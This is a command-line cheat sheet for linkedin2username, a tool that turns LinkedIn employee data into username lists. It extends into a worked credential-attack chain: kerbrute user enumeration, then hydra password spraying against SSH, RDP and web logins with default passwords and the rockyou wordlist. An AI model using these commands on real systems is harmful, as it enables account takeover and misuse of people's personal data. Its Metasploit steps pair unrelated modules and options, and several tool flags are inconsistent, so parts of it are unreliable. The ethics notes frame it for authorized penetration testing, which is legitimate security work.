linkedin2username

Overview

linkedin2username is a tool that generates potential username lists from LinkedIn company employee data. During authorized penetration testing and security research, it helps identify valid usernames for targeted environments by analyzing publicly available employee information. The tool supports multiple naming conventions (firstname.lastname, firstnamelastname, flastname, etc.) and integrates with credential enumeration workflows for authorized security testing.

Installation

Linux

# Clone from GitHub
git clone https://github.com/initstring/linkedin2username.git
cd linkedin2username

# Install dependencies
pip3 install -r requirements.txt

# Make executable
chmod +x linkedin2username.py

macOS

# Clone repository
git clone https://github.com/initstring/linkedin2username.git
cd linkedin2username

# Install with pip
pip3 install -r requirements.txt

# Create symlink for easy access
sudo ln -s $(pwd)/linkedin2username.py /usr/local/bin/linkedin2username

Windows

# Clone repository
git clone https://github.com/initstring/linkedin2username.git
cd linkedin2username

# Install dependencies
pip install -r requirements.txt

# Run with Python
python linkedin2username.py

Kali Linux

# Clone and install
git clone https://github.com/initstring/linkedin2username.git
cd linkedin2username
pip3 install -r requirements.txt

# Or install via apt
apt-get install linkedin2username

Basic Usage

Simple Username Generation

Command	Description
python3 linkedin2username.py -c "Company Name"	Generate usernames from company employees
python3 linkedin2username.py -c "Company" -f firstname.lastname	Custom format output
python3 linkedin2username.py -c "Company" -o output.txt	Save to file
python3 linkedin2username.py -l employees.txt	Use local HTML file

Common Scenarios

# Basic usage with company name
python3 linkedin2username.py -c "Acme Corporation"

# Save output to file
python3 linkedin2username.py -c "Acme" > usernames.txt

# Multiple companies
python3 linkedin2username.py -c "Company1" > company1.txt
python3 linkedin2username.py -c "Company2" > company2.txt
cat company*.txt > all_users.txt

# Use with other tools
python3 linkedin2username.py -c "Target" | tee target_users.txt

Output Formats

Available Naming Conventions

# firstname.lastname (John.Smith)
python3 linkedin2username.py -c "Company" -f "firstname.lastname"

# firstnamelastname (JohnSmith)
python3 linkedin2username.py -c "Company" -f "firstnamelastname"

# first.last (j.smith)
python3 linkedin2username.py -c "Company" -f "first.last"

# firstlast (jsmith)
python3 linkedin2username.py -c "Company" -f "firstlast"

# first_last (john_smith)
python3 linkedin2username.py -c "Company" -f "first_last"

# Custom format with initials
python3 linkedin2username.py -c "Company" -f "firstinitial.lastname"

Format Examples

# Given: John Smith

# Format 1: firstname.lastname → john.smith
# Format 2: firstnamelastname → johnsmith
# Format 3: first.last → j.smith
# Format 4: firstlast → jsmith
# Format 5: first_last → john_smith
# Format 6: flastname → jsmith
# Format 7: first → john
# Format 8: last → smith

Data Collection Methods

Using LinkedIn Company Pages

# Method 1: Manual data extraction
# 1. Navigate to company LinkedIn page
# 2. Search for "current employees"
# 3. Export/copy employee list
# 4. Save as employees.txt

# Method 2: Using LinkedIn API (if available)
# Requires LinkedIn authentication
# Limited by terms of service
python3 linkedin2username.py -c "Company" --auth username:password

Scraping Employee Data

# Using browser automation
# Save LinkedIn search results to HTML

# Option 1: Manual browser export
# 1. Open LinkedIn company page
# 2. Scroll through employees
# 3. Right-click → Save as... (employees.html)
# 4. Use with linkedin2username

python3 linkedin2username.py -l employees.html -c "Company"

# Option 2: Using Selenium (if supported)
# Automates LinkedIn data extraction

Working with Existing Data

# If you have employee list in text format
cat << 'EOF' > employees.txt
John Smith
Jane Doe
Bob Johnson
Alice Williams
EOF

# Convert to usernames
python3 linkedin2username.py -i employees.txt -f "firstlast"

Advanced Techniques

Multiple Format Generation

#!/bin/bash
# Generate all common username formats

COMPANY="Acme"
FORMATS=(
  "firstname.lastname"
  "firstnamelastname"
  "first.last"
  "firstlast"
  "first_last"
  "flastname"
)

for format in "${FORMATS[@]}"; do
  echo "[*] Generating format: $format"
  python3 linkedin2username.py -c "$COMPANY" -f "$format" \
    >> ${COMPANY}_${format}.txt
done

# Combine and deduplicate
cat ${COMPANY}_*.txt | sort -u > ${COMPANY}_all_usernames.txt

Integrating with Credential Enumeration

# Generate usernames
python3 linkedin2username.py -c "Target" -f "firstlast" > usernames.txt

# Prepare for password spraying
# Create user:password combinations
while read username; do
  echo "${username}:Password123"
done < usernames.txt > credentials.txt

# Use with hydra
hydra -L usernames.txt -P passwords.txt \
  -t 4 ssh://192.168.1.10

# Use with kerbrute
kerbrute userenum --dc 192.168.1.10 -d domain.local usernames.txt

Email Address Generation

# From linkedin2username usernames, generate email addresses
# Assuming company domain is company.local

while read username; do
  echo "${username}@company.local"
done < usernames.txt > emails.txt

# Generate variations
for username in $(cat usernames.txt); do
  echo "${username}@company.local"
  echo "${username}@company.com"
  echo "${username}@mail.company.local"
done | sort -u > emails_all.txt

Data Processing and Analysis

Filtering Results

# Remove duplicates
sort -u usernames.txt > usernames_unique.txt

# Filter by pattern
grep "^[a-z]\." usernames.txt > firstname_initial.txt

# Count occurrences
cat usernames.txt | wc -l

# Find most common first names
cut -d'.' -f1 usernames.txt | sort | uniq -c | sort -rn

# Identify potential service accounts
grep -i "svc\|service\|admin\|test" usernames.txt

Creating Target Lists

# Extract usernames only
python3 linkedin2username.py -c "Company" -f "firstlast" | \
  awk '{print $1}' > targets.txt

# Create username frequency list
cat usernames.txt | sort | uniq -c | sort -rn > frequency.txt

# Identify common username patterns
cat usernames.txt | sed 's/[0-9]//g' | sort | uniq -c > pattern_analysis.txt

Integration with Penetration Testing Tools

Kerbrute Username Enumeration

# Generate usernames
python3 linkedin2username.py -c "Target" -f "firstlast" > usernames.txt

# Use kerbrute to find valid AD usernames
kerbrute userenum --dc 192.168.1.10 \
  -d domain.local usernames.txt

# Output valid usernames
kerbrute userenum --dc 192.168.1.10 \
  -d domain.local usernames.txt -o valid_users.txt

Hydra Password Spraying

# Generate usernames with format suitable for hydra
python3 linkedin2username.py -c "Target" -f "firstlast" > users.txt

# Create password list
echo "Password123" > passes.txt
echo "Welcome2026" >> passes.txt

# SSH password spray
hydra -L users.txt -P passes.txt \
  -t 4 -f ssh://192.168.1.100

# HTTP/HTTPS
hydra -L users.txt -P passes.txt \
  -t 4 -f http-post-form://target.com/login

# RDP
hydra -L users.txt -P passes.txt \
  -t 4 -f rdp://192.168.1.200

Metasploit Integration

# Generate username list
python3 linkedin2username.py -c "Target" > usernames.txt

# Use in Metasploit for credential testing
msfconsole

# Load module for enumeration
use auxiliary/scanner/snmp/snmp_enum_users

# Or use with auxiliary SSH scanner
use auxiliary/scanner/ssh/ssh_version

# Set options
set USER_AS_PASS true
set RHOSTS 192.168.1.0/24

Custom Scripting

#!/bin/bash
# Integrated username generation and validation

COMPANY="Target"
DOMAIN="domain.local"
DC_IP="192.168.1.10"

echo "[*] Generating LinkedIn usernames for $COMPANY"
python3 linkedin2username.py -c "$COMPANY" -f "firstlast" > users_temp.txt

echo "[*] Validating usernames against AD..."
kerbrute userenum --dc $DC_IP -d $DOMAIN users_temp.txt -o valid_users.txt

echo "[*] Valid users found:"
cat valid_users.txt

echo "[*] Attempting to crack passwords..."
hydra -L valid_users.txt -P /usr/share/wordlists/rockyou.txt \
  -t 4 ssh://$DC_IP

# Cleanup
rm users_temp.txt

Privacy and Legal Considerations

Authorized Data Collection

# LinkedIn terms of service restrictions
# - Scraping violates LinkedIn ToS in most regions
# - Alternative: Use LinkedIn's official recruiter tools
# - For pen tests: Only use with written authorization
# - Must define scope: which companies/departments

# Documentation template
echo "LinkedIn2Username Authorization"
echo "Target Company: ACME Corporation"
echo "Scope: Current employees only"
echo "Purpose: Authorized penetration test"
echo "Duration: 2026-05-02 to 2026-05-15"
echo "Approval: [Manager Signature]"

Ethical Usage Guidelines

# Responsible username generation
# 1. Only generate from authorized company
# 2. Use only within authorized test scope
# 3. Don't share usernames outside test team
# 4. Report findings securely
# 5. Cleanup and document usage

# Example report
cat << 'EOF' > engagement_report.txt
LinkedIn2Username Analysis Report
Target: ACME Corporation
Date: 2026-05-02
Scope: Authorized security testing

Findings:
- 542 LinkedIn employees identified
- 4 naming convention variations tested
- 267 unique username formats generated
- 89 valid AD usernames confirmed (via kerbrute)
- 12 accounts with weak/default passwords

Recommendations:
- Implement username policy controls
- Deploy MFA across all accounts
- Monitor for failed authentication attempts
- Review LinkedIn visibility policies
EOF

Troubleshooting

No Results Generated

# Company name not found
# Solution: Try variations
python3 linkedin2username.py -c "ACME"
python3 linkedin2username.py -c "Acme Corp"
python3 linkedin2username.py -c "ACME Corporation"

# Verify format string
python3 linkedin2username.py -c "Company" -h
# Check available format options

# Debug output
python3 linkedin2username.py -c "Company" -v

Format Issues

# Special characters in names
# Solution: Script handles most cases, but verify output
python3 linkedin2username.py -c "Company" -f "firstlast" | head -20

# Numbers in names (Jr., II, III)
# These may be stripped depending on format
grep "[0-9]" usernames.txt

# Hyphenated names
# May be handled as single or separate
grep "\-" usernames.txt

Integration Problems

# Kerbrute not finding users
# Verify usernames match domain format
# Try different formats
python3 linkedin2username.py -c "Company" -f "first.last"
kerbrute userenum --dc dc.domain.local -d domain.local users.txt

# Password spraying timeout
# Reduce thread count
hydra -L users.txt -P pass.txt -t 2 ssh://target

# Check for account lockout policies
# Adjust spray rate accordingly

Performance Optimization

Processing Large Lists

# For 5000+ employees
# Split into smaller batches
split -l 1000 large_usernames.txt batch_

# Process in parallel
for batch in batch_*; do
  kerbrute userenum --dc dc.domain.local \
    -d domain.local $batch &
done
wait

# Combine results
cat valid_*.txt > all_valid_users.txt

Caching Results

# Save generated usernames for reuse
python3 linkedin2username.py -c "Company" -f "firstlast" \
  > company_usernames_$(date +%Y%m%d).txt

# Search cache for existing lists
ls company_usernames_*.txt
grep "john" company_usernames_*.txt

References

• linkedin2username GitHub Repository
• LinkedIn Terms of Service
• Kerbrute User Enumeration
• Hydra Password Spraying
• OSINT Techniques for Penetration Testing
• Authorized Security Testing Guidelines
• Social Engineering Attacks
• MITRE ATT&CK T1589 Gather Victim Identity Information